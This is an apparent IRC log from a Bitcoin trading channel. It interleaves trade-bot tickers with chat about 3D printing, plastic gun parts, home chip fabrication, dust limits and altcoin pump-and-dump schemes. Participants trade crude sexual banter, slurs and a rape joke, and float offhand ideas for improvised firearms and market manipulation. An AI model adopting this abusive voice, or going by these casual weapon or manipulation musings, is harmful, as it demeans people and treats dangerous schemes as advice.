kakobrekla: this sounds like a story from a former soviet state :D May 05 19:53:11 naw its somalia May 05 19:53:14 actually the town here starting hireing local police and it was mostly chicks. on like, high heels and shit. May 05 19:53:16 kakobrekla i have older logs for sale... almost uninterrupted since last september or so ;) May 05 19:53:21 i got a bj once just on the strength of asking May 05 19:53:28 local police is pretty cool. May 05 19:53:40 cads, slovenia really (dont want you get too confused) May 05 19:54:22 jurov i have longs since day 1 prolly May 05 19:54:29 but they are all messed up May 05 19:54:33 so fuck it May 05 19:55:03 maybe i can unmess some logs in exchange for fucking May 05 19:55:12 khm. May 05 19:55:23 who does who? May 05 19:55:30 i'm versatile May 05 19:55:54 let's try both, what feels better May 05 19:56:08 hehe May 05 19:56:21 speaking of i heard that there isnt much fuckin among man gay community May 05 19:56:43 mostly oral? May 05 19:56:53 where u heard? in church? May 05 19:57:17 orkaa [on this chan] has lots of gay friends and he did a pool May 05 19:57:32 poll May 05 19:57:39 maybe he did a pool too May 05 19:57:51 hmm, It's an interesting problem. Given some number k of incomplete logs, collected by different people, with different latencies, and hence different orders of message arrival in general, how do you fuse the logs into a single log that has more accurate information? May 05 19:57:52 actually pool might work better May 05 19:58:38 if k is a large number, you can try to find voting blocs - groups of logs that agree on the same history May 05 19:58:46 cads you disregard accuaracy and thats it May 05 19:59:13 also disregard my grammer skillz May 05 19:59:24 cads ask freenode to give you millisecond-precision data May 05 19:59:51 you think they log the channels? May 05 20:00:29 nah May 05 20:00:42 i'm rather joking, likely not May 05 20:02:05 [HAVELOCK] [SDICE] 10 @ 0.29020001 = 2.902 BTC [-] May 05 20:02:06 $avg May 05 20:02:06 [HAVELOCK] [SDICE] 10 @ 0.2902 = 2.902 BTC [-] May 05 20:02:06 in any case, the full problem is an interesting problem in the logging literature and in the AI literature - given some collection of possibly contradictory logs, process them into a single, more trustworthy digest log May 05 20:02:07 [HAVELOCK] [SDICE] 8 @ 0.2901 = 2.3208 BTC [-] May 05 20:02:07 benkay: 112.70 May 05 20:02:08 sigh. am wasting time, should be fixing minor mess here instead May 05 20:02:15 [MPEX] [S.MPOE] 2681 @ 0.00068835 = 1.8455 BTC [-] May 05 20:02:17 [MPEX] [S.MPOE] 3147 @ 0.00068174 = 2.1454 BTC [-] May 05 20:02:42 the problem of combing two chatlogs taken from different view points is a much simpler instance of that general problem. May 05 20:03:05 [HAVELOCK] [VTX] 5 @ 0.46566004 = 2.3283 BTC [-] May 05 20:03:06 [HAVELOCK] [VTX] 6 @ 0.46566003 = 2.794 BTC [-] May 05 20:03:07 [HAVELOCK] [VTX] 9 @ 0.46566002 = 4.1909 BTC [-] May 05 20:03:48 hehe, and it's totally unreasonable to apply those techniques, when there'd be nothing to gain that grepping through the collected chatlog as they are would not do just as well, hah May 05 20:04:03 ;;ticker May 05 20:04:04 BTCUSD ticker | Best bid: 115.01000, Best ask: 115.39598, Bid-ask spread: 0.38598, Last trade: 115.01000, 24 hour volume: 98006.84160658, 24 hour low: 107.00000, 24 hour high: 118.85000, 24 hour vwap: 112.76572 May 05 20:05:29 where u heard? in church? << epic. May 05 20:05:49 but jurov, seriously : in a household of three women i fuck each maybe once or twice a week May 05 20:05:55 and in the ass once a month or less May 05 20:06:11 i imagine they'd be pretty sore if the holes were reversed May 05 20:11:25 oka, i did no research and seems i had luck on guys that don't think very highly on oral May 05 20:11:34 "sore? yeah, get used to it" May 05 20:12:03 i c May 05 20:21:13 off to get a massage, night all May 05 20:22:57 you really are slow arnt you tiberslav? :) May 05 20:23:05 [HAVELOCK] [SDICE] 8 @ 0.2899 = 2.3192 BTC [-] May 05 20:23:12 anyway have a good one, try not to fall down and kill yourself before i get back! May 05 20:24:06 [HAVELOCK] [SDICE] 5 @ 0.28000001 = 1.4 BTC [-] May 05 20:24:06 [HAVELOCK] [SDICE] 5 @ 0.28 = 1.4 BTC [-] May 05 20:27:11 #bitcoin-assets, the liberal-hating trade chanel where people discuss their sexual orientation and substance history May 05 20:28:05 [HAVELOCK] [SDICE] 5 @ 0.26 = 1.3 BTC [-] May 05 20:28:06 you forgot philosophical masturbation May 05 20:28:06 [HAVELOCK] [SDICE] 20 @ 0.25025 = 5.005 BTC [-] May 05 20:28:07 [HAVELOCK] [SDICE] 2 @ 0.2501 = 0.5002 BTC [-] May 05 20:28:08 [HAVELOCK] [SDICE] 3 @ 0.25 = 0.75 BTC [-] May 05 20:28:12 a that too yes May 05 20:29:05 [HAVELOCK] [SDICE] 35 @ 0.25 = 8.75 BTC [-] May 05 20:31:05 [HAVELOCK] [SDICE] 1 @ 0.241 BTC [-] May 05 20:33:39 [BTCTC] [PAJKA.BOND] 4 @ 0.108899 = 0.4356 BTC [+] May 05 20:39:32 hey, any 3d printing enthusiasts in here? May 05 20:40:23 i have ~80% of cnc machine finished which im thinking i could convert to 3d printer May 05 20:40:51 oh nice, what layout? May 05 20:41:07 or make, really May 05 20:43:42 http://shrani.si/f/Z/RG/4qUD9X4i/5/dscn0196.jpg May 05 20:43:50 http://shrani.si/f/2h/tU/4D24xeIq/dscn0199.jpg May 05 20:43:58 http://shrani.si/f/20/fZ/4whyU0d2/dscn0201.jpg May 05 20:44:54 spent 5k+ on parts and a year of work (when i found the time to fiddle with it) May 05 20:45:13 then i got occupied with other stuff and its like that for like 2 years maybe more now May 05 20:45:20 https://www.xkcd.com/924/ May 05 20:45:36 kakobrekla: awsome gantry May 05 20:45:46 i have a mendel May 05 20:45:55 thats half way through an electronics upgrade from like two years ago... May 05 20:45:57 =/ May 05 20:46:11 cads its only missing Z axis really May 05 20:46:15 the rest is done May 05 20:46:37 i could put anything on it really May 05 20:46:42 a spindle or laser or a cigar May 05 20:47:00 [BTCTC] [TAT.ASICMINER] 28 @ 0.01255 = 0.3514 BTC [+] May 05 20:47:13 kakobrekla: the "vitamins" needed to put together a 3d printer - steppers, controllers, RAMP board, and linear actuators - are only around $300. As soon as your mill is up and running with a mill head, you could fabricate the parts for a 3d printer kit fairly easily. May 05 20:47:36 i already have steppers and cotrollers and all that shit May 05 20:47:49 12nm each btw May 05 20:47:55 overkill :) May 05 20:48:20 and there are two for x axis May 05 20:48:23 The 3dp community advises against 3d printer/mill hybrids. A mill needs torque and stiffness, while a 3d printer needs lightness and feed speeds - they use speeds that are rather shocking to people used to traditional mills May 05 20:48:37 myea May 05 20:49:05 so a mill/printer hybrid will perform poorly at least one task :D May 05 20:49:43 well i can switch the gap on the rod that steppers move May 05 20:49:53 and that changes speed/power ratio as well May 05 20:51:33 what do even rather than any of that, sell it as is May 05 20:51:44 :) May 05 20:52:31 haha, how much? May 05 20:53:12 dunno gimme an offer May 05 20:53:17 I may _need_ a gantry, but I couldn't pay more than $800 for it, and this would likely be an insult. May 05 20:53:26 lol kinda May 05 20:53:28 :) May 05 20:53:30 considering your sunk cost May 05 20:53:41 id take maybe 3k for it May 05 20:54:38 then i got occupied with other stuff and its like that for like 2 years maybe more now << i blame marketing. May 05 20:54:51 i was raped May 05 20:55:11 it's amazingly rigid looking construction - at least you have a quality product :) May 05 20:55:27 ya some pros were invlived May 05 20:55:45 such a machine finished is worth 15-20k May 05 20:55:47 I'm looking at a lower quality offering in the range of $1500, in kit form May 05 20:56:05 so pay him in bitcoinz May 05 20:56:08 or bitbet shares May 05 20:56:10 [BTCTC] [ESECURITYSABTC] 1 @ 0.4 BTC [+] May 05 20:57:35 so i'm re-reading an old (romanian) article May 05 20:57:42 and in the comments i make the following suggestion : May 05 20:57:46 kakobrekla: it needs z-fixtures and milling head? May 05 20:58:01 some shetroll could implant christian-only eggs only to abort them 10 weeks in. May 05 20:58:40 if it werent for btc maybe id finish it May 05 20:59:03 cads yea preety much May 05 20:59:06 kakobrekla: I hope you do! What kind of ideas did you have planned for it. May 05 20:59:13 anyway i gotta jet now May 05 20:59:15 be back in 30 or so May 05 20:59:59 inhies: it seems like a lot of rep-rap grade printers end up gathering dust May 05 21:00:25 [BTCTC] [ASICMINER-PT] 1 @ 1.24 BTC [-] May 05 21:01:13 cads i blame marketing. May 05 21:01:24 hrm it pisses me off that the reprap community seems to be allowing large corporations to patentblock all the valuable 3DP IP May 05 21:02:09 they worked their ASSES off to make personal desktop manufacturing remotely feasible, and those high capital jackals are waiting for the market to mature so they can pounce. May 05 21:03:31 the worst part is that if you talk to the open 3dp community about setting up defensive publications, they're all like "heck naw. ain't gonna be no centralized IP control on open 3dp tech" May 05 21:04:18 or, "you have any idea how much it costs to file patents?" May 05 21:05:13 cads: the way I understand it, the main virtue of 3d printing is that you can build the thing in your basement out of junkyard parts and not give a rat's arse about patents or copyrights. May 05 21:05:51 asciilifeform if i understand agriculture correctly, the main virtue thereof is you can plant crops in your own back yard May 05 21:05:58 and not give a rat's ass about patents or copyrights May 05 21:06:20 [BTCTC] [S.DICE-PT] 30 @ 0.003279 = 0.0984 BTC [+] May 05 21:06:57 mircea_popescu: if someone found a way to "fix" the atrociously-inefficient RuBisCO enzyme, you could feed a family on what you can grow in a flower vase. May 05 21:07:02 agricultural genetic patents are such horse shit May 05 21:07:51 if 3d printers actually were what their enthusiasts imagine them to be (a substitute for industrial production) rather than machines for churning out brittle crap, the same dynamic would apply here. May 05 21:08:00 say my crop gets contaminated by monstanto genetics from a farm up-wind May 05 21:08:07 [MPEX] [S.MPOE] 6285 @ 0.00069741 = 4.3832 BTC [+] May 05 21:08:10 it may surprise you to find that inefficiency is a blessing not a failure. May 05 21:08:19 I'm not liable to damages claimed by the monsanto company May 05 21:08:34 s/not/now May 05 21:08:35 mircea_popescu: no surprise here. population explosion, catastrophe, etc May 05 21:08:54 re: 3d printing and whether is is actually useful: http://scottlocklin.wordpress.com/2012/08/11/bad-engineering-journalism-reporting-on-3-d-printing-of-guns/ May 05 21:09:01 anyone want to see flowering salvia ? May 05 21:09:43 a CNC mill is infinitely more useful in practice. but it doesn't have the same sexy appeal to noobs who think they can produce arbitrary widgets just by hitting a button (actually false for both solid printing and cnc) May 05 21:10:07 [MPEX] [S.DICE] 3806 @ 0.00321048 = 12.2191 BTC [-] May 05 21:10:29 "The AR is one of the few rifle designs where you could even think about using a lower receiver made out of plastic." May 05 21:10:31 this is such bs. May 05 21:10:53 you know i appreciate the sentiment of calling out business insider et al for their ignorance, which is patent and outrageous May 05 21:11:00 but locklin doesn't strike me as much better honestly. May 05 21:11:12 mircea_popescu: it may help to know that the focus on the AR is solely because of a weird quirk of U.S. law May 05 21:11:27 no, i just mean the bad science of it May 05 21:11:27 in the U.S., the part which legally counts as "the gun" is the piece with the serial number on it. May 05 21:11:36 he upper receiver of the AR-15 is legally the gun, and a plastic version would melt if it didn’t dissolve from mechanical stress the first time you fired it. May 05 21:11:52 either he has no idea what plastic is or he's just following some script. May 05 21:12:16 so you can buy the entire metal portion of a Glock, for example (barrel and striker mechanism) with no paperwork, as if it were a video card. because the SN is stamped on an aluminum plate embedded in the lower, plastic portion. May 05 21:12:20 you can in fact produce polymers of any arbitrary hardness, however you define it. May 05 21:13:16 mircea_popescu: find me a polymer which can be used to produce a barrel reliably firing modern calibers. I know people who will pay very serious moneys for such. May 05 21:13:31 hardness is not the only issue. (temperature is another.) May 05 21:13:40 hrm May 05 21:13:51 my AR lowers are legally the gun, since thats where the serial number is :p May 05 21:13:56 guess it all depends on where you get parts May 05 21:14:08 inhies: exactly. hence the 3d printer folks interest in the AR. May 05 21:14:45 think of glock's nylon derivatives May 05 21:15:05 also, plenty of non-plasticizing composites may well work in the 3d printer model. May 05 21:15:09 for those who have never seen an AR, the "lower" is simply a small can which holds the trigger/hammer mechanism, with the stock screwing into one end and the bold carrier/barrel assembly (known as the "upper") into the other end. May 05 21:15:41 people have carved AR lowers out of kitchen cutting boards, for instance. and even wood. May 05 21:16:26 mircea_popescu: if you can produce a polymer which reliably stays in one piece in the form of a rifled barrel, you can become a far, far richer man than you already are. May 05 21:16:49 dude i'm certain it can be done. May 05 21:17:06 mircea_popescu: done, yes. consider aerogel. economically, no. May 05 21:17:09 dissolve my foot. May 05 21:17:13 economically was never the point. May 05 21:17:18 hence my comment on bad science May 05 21:17:56 3d printers are being touted by idiots as "we can now produce modern arms in our basement without knowing any machining." which is patently false, and is likely to remain so. May 05 21:18:11 actually! here's a blueprint : i bet you can get a formulation of some sort of carbide, maybe even tungsten base, to dissolve in a solvent that evaporates at room temeprature May 05 21:18:16 metalworking isn't hard, but it does require some skill. May 05 21:18:38 so you will be able to ACTUALLY print a harder-than-steel barel witha good 3d printer May 05 21:18:40 mircea_popescu: yes, sintering. even in the USSR, they had it. May 05 21:18:44 right ? May 05 21:18:49 so then wtf is locklin on about May 05 21:18:53 only problem is, sintered materials are brittle May 05 21:18:54 you don't fight bad science with bad science May 05 21:19:11 a barrel flexes (watch an AK on full auto on youtube, high speed camera. 4-5 cm of flex, like a Slinky.) May 05 21:19:26 dude, let's make a pistorl May 05 21:19:40 [BTCTC] [BTC-BOND] 1 @ 0.01 BTC [-] May 05 21:19:42 before you make a TOW 6 barrel double rotating machine gun May 05 21:20:18 if all you want is 17th century tech, you can easily make single-shot pistol or shotgun from hardware store pipes. and it will be far more reliable (and deadly to the enemy, vs. the user) than anything you can get out of a $3k 3d printer. May 05 21:20:28 and brittleness doesn't sound undefeasible either. maybe you add some guar gum or some shit May 05 21:20:50 [BTCTC] [ASICMINER-PT] 15 @ 1.245 = 18.675 BTC [+] May 05 21:21:04 [BTCTC] [TAT.ASICMINER] 1 @ 0.01255 BTC [+] May 05 21:21:13 mircea_popescu: look up the temperature of the inside of a barrel (of the smallest pistol) after one shot. May 05 21:21:29 carbides melt now ? May 05 21:21:35 did you really suggest guar gum or the like? May 05 21:21:42 i was making a point! May 05 21:21:43 [BTCTC] [ASICMINER-PT] 1 @ 1.249999 BTC [+] May 05 21:21:56 as in, it's extremely unlikely you won't find a debrittleing additive May 05 21:22:01 if you don't need many shots, even this works: http://en.wikipedia.org/wiki/Leather_cannon May 05 21:22:38 my point wasn't that it is physically impossible to make small arms out of garbage (it is possible) but that a 3d printer gains you nothing compared to using parts straight from the junkyard. May 05 21:23:52 it does gain you something. May 05 21:23:56 at the very least the cool of it. May 05 21:24:12 further, if my carbide solution actually works any, you could be making the guns as fast as you fire them for instance May 05 21:24:26 imagine a remote opperated batter of gun printers and robofirers May 05 21:24:36 btw, I personally have a design for a 3d printer which prints solid steel. think "TIG welder" plus XYZ frame. but this would be ruinously expensive to run, and would burn down the house of the first idiot who builds on in his garage. so, unpublished. May 05 21:25:37 mircea_popescu: if you want to go the whole hog, dispense with cartridges. fire nails or ball bearings, with injected gasoline for the propellant. May 05 21:25:42 " If he just wanted to make a working gun out of a barrel and bolt, he could have done so with duct tape, modeling clay and superglue." May 05 21:25:46 again, this point is correct. May 05 21:25:56 but the foregoing statements are both incorrect and misleading. May 05 21:26:15 contrary to popular delusion, the fist of the State will come down in the future not on guns, but on ammunition. May 05 21:27:18 producing crude but working small arms is trivial. modern ammunition, not so much. May 05 21:27:35 " Solid printers can make crude unassembled plastic parts; nothing else. No electronics can be made in this way." May 05 21:27:39 again, this is fuckwittery. May 05 21:27:44 all electronics are made in this way May 05 21:27:47 I can see the political virtues of reviving the skills of building 18th century muskets, but 3d printers aren't usefully in the mix. May 05 21:27:48 chips are lierally printed May 05 21:27:55 and then the pcbs are mounted by machine May 05 21:28:14 this guy is incredibly ignorant and wilfully so. May 05 21:28:45 mircea_popescu: do you own a chip fab? does it fit in your house? why, or why not? using the term "printing" for photomask fabrication is disingenuous. May 05 21:28:52 why ? May 05 21:28:58 the early printers didn't fit in my jhouse May 05 21:29:01 nor the early computers May 05 21:29:02 astronomical tooling cost May 05 21:29:09 note that i dispute the "can not" claim May 05 21:29:14 i do not make the "can" claim. May 05 21:29:34 again, if we protest scientific ignorance of journos May 05 21:29:41 let's not demonstrate it one knot up the river. May 05 21:30:15 btw, I am personally researching a means for fabricating 1980s-level VLSI in "bush conditions." No prizes for guessing why. But I cannot promise that anything will come of it. May 05 21:31:55 bush condition means no metal ? May 05 21:32:24 meaning a plebe's budget. May 05 21:32:40 a May 05 21:33:18 hm May 05 21:33:24 i'd bet against it. May 05 21:33:37 smart money bets against, yes. May 05 21:34:08 no but i mean... you will need a laser. May 05 21:34:18 although I do have access to university surplus lab junk. May 05 21:34:29 and very high precision controls for moving it May 05 21:34:45 SAW resonator May 05 21:34:51 Kerr cell for toggling May 05 21:34:59 um May 05 21:35:13 whoa May 05 21:35:17 can you acrtually fabricate silicon with resonance without having very specially made foundry silicon ? May 05 21:35:23 as in, won't it just crack ? May 05 21:35:43 no, you get the SAWs from the uni junkyard May 05 21:36:00 ok, but do what with them lol May 05 21:36:03 alternatively, DLP arrays from consumer video projectors May 05 21:36:22 (granted the latter gives you LSI at best, 1970s level) May 05 21:36:25 [BTCTC] [CRYPTO-TRADE] 1 @ 0.19723 BTC [-] May 05 21:36:53 i tell ye i don't see it. May 05 21:36:55 I'm more interested in the ion beam deposition approach, rather than optical masks, though May 05 21:37:37 [BTCTC] [CRYPTO-TRADE] 1 @ 0.19724 BTC [+] May 05 21:37:38 I assume you were asking about optical (traditional) photo etching May 05 21:38:15 hi\ May 05 21:38:30 yea May 05 21:38:32 i am guest 18 fucking 208 May 05 21:38:36 hi guest. May 05 21:38:40 just ask me anything May 05 21:38:45 hows urmom May 05 21:38:46 what is your mission May 05 21:38:53 mostly anal May 05 21:38:57 next question May 05 21:38:58 ion beam (http://en.wikipedia.org/wiki/Ion_beam_deposition) is ever so slightly more doable, I suspect. May 05 21:39:17 [BTCTC] [CRYPTO-TRADE] 2 @ 0.198 = 0.396 BTC [+] May 05 21:39:23 mebbe. ianae May 05 21:39:39 ianaproctologist May 05 21:40:15 asciilifeform a friend of mine built an ion beam microscope May 05 21:40:43 got a point source for waving around with em fields by using a pinhole May 05 21:40:57 benkay: one can trivially build an STM out of junkyard parts: http://www.e-basteln.de/index_m.htm May 05 21:41:00 he told me that and i were all OMGOFCOURSE May 05 21:41:04 mostly useless for semiconductor work, though May 05 21:41:24 this were no tunneler May 05 21:41:30 and this is just an interesting anecdote May 05 21:44:20 $avg May 05 21:44:21 benkay: 113.06 May 05 21:44:26 maybe organic semiconductors would be more suitable than silicon? May 05 21:44:58 jurov: I'm looking into copper oxide May 05 21:45:26 http://en.wikipedia.org/wiki/Talk%3AJulius_Edgar_Lilienfeld May 05 21:46:06 "in 1995 R. G. Arns found a 1948 legal deposition by Johnson which said the opposite: that Bell Labs back then had a project to test Lilienfeld's transistors, and before Johnson took over the project," May 05 21:47:08 "...a paper, JVST A Volume 20, Issue 4, pp. 1365-1368 describing transistors made with anodized aluminum gate insulator and a chemical bath deposited semiconductor (CdS/CdSe). Both are techniques that do not require complicated equipment (beaker, current source, heater) and should have been accessible in the 1920s." May 05 21:48:24 TLDR: an obscure German fellow almost certainly had working transistors in the '20s. May 05 21:48:55 truffles: not really. May 05 21:49:10 although Bell Labs was denied the patent on the basis of his prior art. May 05 21:50:48 granted, there is quite a leap from Lilienfeld's cupric oxide transistor to kitchen table VLSI. but it seems like a promising idea to investigate. May 05 21:51:48 [MPEX] [S.MPOE] 14500 @ 0.00069899 = 10.1354 BTC [+] May 05 21:53:06 [HAVELOCK] [SDICE] 5 @ 0.2401 = 1.2005 BTC [-] May 05 21:53:07 [HAVELOCK] [SDICE] 12 @ 0.24 = 2.88 BTC [-] May 05 21:53:27 [BTCTC] [TAT.ASICMINER] 39 @ 0.01255 = 0.4895 BTC [+] May 05 21:54:06 [HAVELOCK] [SDICE] 5 @ 0.24 = 1.2 BTC [-] May 05 21:59:10 why ? May 05 22:00:11 if anyone missed it, the latest debate with datskovskiy is raging even now http://trilema.com/2013/some-basic-discussion-of-bitcoin-macroeconomy/#comment-93049 May 05 22:00:19 presumably for basement mining hardware? May 05 22:02:20 i tried to point out that shitcoins are akin to banknotes that you can remotely tamper with their value May 05 22:02:28 asciilifeform: what's your 3d printing background? May 05 22:02:42 and thus obviously nobody is interested in accepting them May 05 22:02:54 but it went nowhere May 05 22:03:59 what I heard was a lot about printing guns, without any mention of things like the thingiverse, the form 1, makerbot industry's successes, the fact that the staples is rolling out a 3d printer that will be sold from their stores (the cubify offering). May 05 22:04:19 3d printed guns is about 1 year old May 05 22:04:38 and the whole topic is only for lunatics May 05 22:05:08 this is like judging bitcoin solely on the characteristics of its use in the silk road. May 05 22:06:32 appplications for 3d printing are amazingly wide ranging. The cubify is a mass produced unit in the $1200 range, intended for crafts and hobbies, school classrooms, children, and so on. May 05 22:07:21 it's also misleading to say that 3d printers require the same CAD/CAM work that mills require May 05 22:07:53 mircea_popescu GPG identity management services will eclipse the engineering payroll? o.O please correct my interpretation of what you said on the other side of that link May 05 22:09:04 nope, that's it. May 05 22:09:12 identity management will be larger than engineering. May 05 22:09:38 asciilifeform: this is not true - for a well tuned commercial printer, the process of turning a 3d design into gcode is almost trivial. Coding g-code for a cnc mill is amazingly hard for high complexity parts, and often requires the production of specialized tooling and setup costs for each new part you produce May 05 22:10:31 you dont code g-code May 05 22:10:44 nobody does that May 05 22:10:46 no, you synthesize it May 05 22:10:50 yea May 05 22:11:10 or May 05 22:11:13 print the big form May 05 22:11:22 carve off the bits you need for dimensional correctness with a mill May 05 22:11:32 let the printer do the complex geometry May 05 22:13:31 Yep. the print time of a part scales with the part's volume. The milling time of a contoured part scales with the amount of material removed, but more importantly, with the feature count of the surface produced. May 05 22:14:01 [BTCTC] [TAT.ASICMINER] 3 @ 0.01255 = 0.0377 BTC [+] May 05 22:14:59 https://bitcointalk.org/index.php?topic=196138.0 May 05 22:15:03 i think we all seen that ? May 05 22:15:10 print time vastly exceeds cut time May 05 22:15:15 cut time is lols for plastic May 05 22:16:47 why 54 u? May 05 22:17:11 5430 satoshi May 05 22:17:21 not sure how he picked it but looks bellybutton sourced May 05 22:17:22 meh i guess i dont really care about the answer May 05 22:17:45 it seems like something theyll end up removing in the future, so why add it May 05 22:17:45 just barely less than a cent today May 05 22:17:55 100 bucks at some far future point May 05 22:17:58 maybe to prevent some kind of spam attack? May 05 22:18:56 they copied litecoin May 05 22:19:43 i dont like it May 05 22:19:47 you can research what was the motivation in ltc case, maybe it was really spam May 05 22:20:26 or marketing or rape May 05 22:21:17 or porn in the code! May 05 22:22:16 im not sure why they're not just letting the tx fee decide May 05 22:22:19 but whatever. May 05 22:22:42 ah, actually, there is a reason May 05 22:22:49 we are choked by nonadoption/node death May 05 22:23:07 consequently there's no way to outcompete dust txs, cause you don't pay a fee to be relayed May 05 22:23:44 tbh the no-relay-fee is probably the grossest fundamental oversight in the design of bitcoin May 05 22:24:04 and it allows no easy fox May 05 22:24:09 fix* May 05 22:24:33 guess we'll have to just wait for diablocoins May 05 22:25:54 nonadoption of new version numbers? May 05 22:26:36 does anyone know if bitfinex has an irc channel? May 05 22:27:24 i had a thought about altcoin manipulaiton today, it seems that every new altcoin that pops up, magically has buyers on BTC-E. I wonder if it'd be feasible to support new coins so as to keep the difficulty low on the one coin you really want to control and prop up later, like litecoin. You get everyone to move their hashes elsewhere, and then keep reaping LTC, then you pull the plug May 05 22:27:24 one day on all the alts. May 05 22:28:16 benkay: lets talk more about 3dp later - I think there is a great future in personal desktop-based manufacturing, and it seems like 3dp is positioned to bring it to the consumer. There are lots of points of contention I'd love to chat about, but I gotta jet. May 05 22:29:07 ThickAsThieves pretty much the pump and dump they're running May 05 22:29:41 they can even make money pumping the alts too, it just seems like it's a house of cards May 05 22:29:54 yup May 05 22:29:54 seems this alt chain thingy comes in cycles May 05 22:30:06 btc-e is pretty much the reason nobody takes alts seriously May 05 22:30:24 together with bubbles May 05 22:30:42 or when was the last alt chain hype May 05 22:30:50 ixcoin and i0coin and whatnot May 05 22:30:58 so the question is, which, if any, altcoin is the "real" altcoin May 05 22:31:16 bitcoin is preety alt May 05 22:31:59 ltc may have a chance. maybe. May 05 22:32:29 tho the "mmo" idiots beat up in btc moved there, and it's prolly going to be the internet marketeer reservation May 05 22:37:00 cryto-trade.com was supposed to be a BTC-e competitor, but now it seems it was about as scammy as we thought May 05 22:37:13 crypto-trade.com * May 05 22:38:16 damn, went off to meatspace for a spell and missed all the fun here. May 05 22:40:55 there's a log now May 05 22:41:00 public and everything May 05 22:41:58 I got a month of running log, sure May 05 22:46:07 re: 3d printers: I work with a guy who is a serious solid printing enthusiast (five figure investment in various attempts, and most of his spare time.) he prints objects like phone charging cradles and parts for model aircraft. May 05 22:46:58 my argument isn't that solid printing is a waste of time (it is an interesting hobby) but that it is unlikely to displace industrial production for any everyday object May 05 22:47:10 asciilifeform ever ? May 05 22:47:28 I wouldn't say "ever", but it is about the same as home CNC machining May 05 22:47:41 i tell you, originally they thought the same of industrial robots. May 05 22:47:46 clunky, hopeless things. May 05 22:47:47 i.e. you need actual brains to make a useful object, to spec May 05 22:47:57 ie, yuou need brains to climb stairs. May 05 22:48:54 even speaking solely of plastic objects where materials strength is unimportant, the main issue appears to be warping/distortion May 05 22:49:38 example: my colleague prints an iphone cradle, brings in five attempts. the phone fits in the fifth, but only because he threw in the towel and took a hand file to it May 05 22:50:03 the next day he brings in two pieces May 05 22:50:07 (it snapped) May 05 22:50:32 this doesn't prove anything in particular, granted May 05 22:50:51 other than the fact that real-world materials behave in all kinds of interesting ways May 05 22:51:01 and not at all like the ideal solid you see on the CAD screen May 05 22:52:27 btw, industrial robots are an instructive example, because in some fields they are available, but it is very difficult to get people to trust them for all but the simplest operations May 05 22:52:52 except they do everything pretty much. May 05 22:52:59 a fucking CAT scan is you fucking a robot. May 05 22:53:14 lol May 05 22:53:22 the hardware is superb, the vendor software: abysmal. May 05 22:53:34 at least in the pharma sector. May 05 22:54:10 I actually sell a replacement for the latter in one of my day jobs: http://www.molboxllc.com/products.html May 05 22:54:34 almost everyone seems to prefer grad students pushing pipettes, though May 05 22:54:44 given that the robot goes for $250K May 05 22:54:48 lol basically making macros for computer illiterate folk ? May 05 22:54:56 just that May 05 22:55:04 except that in this particular case it works better May 05 22:55:16 (e.g. you don't have to measure the physical objects and fit them to a coordinate grid) May 05 22:55:28 most of the operations in high-throughput pharma screening are repetitive May 05 22:55:41 grad schools suffer from an excess of cheap labor May 05 22:55:47 ^ May 05 22:55:56 t\hey don't really WANT to replace the students May 05 22:56:14 because they get most of their income from pretending those students doing boring shit are "gaining" May 05 22:56:20 killed 1 rat gained 5xp May 05 22:56:21 they don't understand the costs of institutionally embedded knowledge either May 05 22:56:25 mircea_popescu: trust me, I know May 05 22:56:35 but in a few dark corners of the world, results actually matter May 05 22:56:54 (outside the academia pesthole, but even then, by far not always) May 05 22:59:12 The Entropia Universe client is designed to operate on Microsoft compatible PC:s running Microsoft Windows as an operating system. It is not designed to run natively under Mac OS X or Linux. May 05 22:59:12 However, your Mac running OS X or PC running Linux that meet the hardware system requirements for Entropia Universe may also be able to run Microsoft Windows, the operating system needed to run the Entropia Universe client software. May 05 22:59:17 fucking retards ?! May 05 22:59:38 yeah what is this entropica May 05 22:59:43 wat May 05 22:59:49 gives me installer May 05 22:59:50 wants to play May 05 23:00:39 "your broken linux computer could be fixed by installing windoze" May 05 23:00:42 wtf is this shit May 05 23:01:28 most commercial software may as well have this nonsense printed on the box. it is certainly there, between the lines. May 05 23:01:33 http://log.bitcoin-assets.com May 05 23:02:03 [MPEX] [S.MPOE] 839 @ 0.0006992 = 0.5866 BTC [+] May 05 23:03:18 also on the entropica topic May 05 23:03:56 I have a feeling that parameterizing the space and understanding how the engine works is vastly more useful than any existing software package May 05 23:04:54 also i have yet to see it run in real time May 05 23:05:02 and it looks a little computationally intensive May 05 23:06:10 "just run monte carlos over the whole space and optimize for availability of future paths" May 05 23:06:15 "during each iteration of control loop" May 05 23:06:23 well, each iteration may be overkill May 05 23:06:25 ! May 05 23:06:32 i need someone to code me a mmorpg May 05 23:06:43 and if you stay in the pre-calculated space you might be able to avoid re-running the sims May 05 23:08:04 [16:06] i need someone to code me a mmorpg May 05 23:08:29 "Retards: a Bitcoin Story"? May 05 23:08:57 [MPEX] [S.MPOE] 14950 @ 0.00070573 = 10.5507 BTC [+] May 05 23:09:34 With colorful bitcointalk.org people as NPCs and a whole lot of cheap jokes and parody? May 05 23:09:38 [MPEX] [S.MPOE] 2087 @ 0.00070573 = 1.4729 BTC [+] May 05 23:09:39 [MPEX] [S.MPOE] 1972 @ 0.00070787 = 1.3959 BTC [+] May 05 23:09:51 [MPEX] [S.MPOE] 3086 @ 0.00070983 = 2.1905 BTC [+] May 05 23:09:58 hoho May 05 23:10:10 "you enter bitcoin-assets and are instantly covered in buckets of semen" May 05 23:10:22 mirceeeeeaaaaa y u no ntp synchronize? May 05 23:11:09 i'm pulling my hair out over an issue that boils down to trade execution dates few second before the orders were placed May 05 23:11:17 on mpex May 05 23:12:57 mircea_popescu, ur timewarp enginez are misaligned ^^^ May 05 23:14:05 he's probably yelling at the monkeys May 05 23:14:17 Namworld lol maybe May 05 23:14:46 jurov because the server does not have an internet connection. May 05 23:14:51 time synch is a mutherfuckin pain May 05 23:15:22 basically you're stuck synching to mpex rather than expecting real time having any impact May 05 23:16:11 do you have something available for ntp to peer to? May 05 23:16:32 nope. May 05 23:16:41 but it even diverges from time given in stat header May 05 23:16:54 now that's rare wtf. May 05 23:17:12 jurov is it the case right now or was it in the past ? May 05 23:17:12 [BTCTC] [PAJKA.BOND] 1 @ 0.108899 BTC [+] May 05 23:17:32 it manifests since yesterday May 05 23:18:08 dude usure ? May 05 23:20:54 [BTCTC] [ASICMINER-PT] 2 @ 1.24 = 2.48 BTC [-] May 05 23:21:07 it;s like 10 seconds behind oddly. May 05 23:22:31 mircea_popescu: you can synch time on a non-networked server using a GPS/GLONASS/Beidou-1 receiver May 05 23:22:46 yeah but that doesn't fit ;/ May 05 23:22:51 make sure to tune in all three constellations, as someone may want to fuck with you via signal spoofing May 05 23:23:00 doesn't fit? May 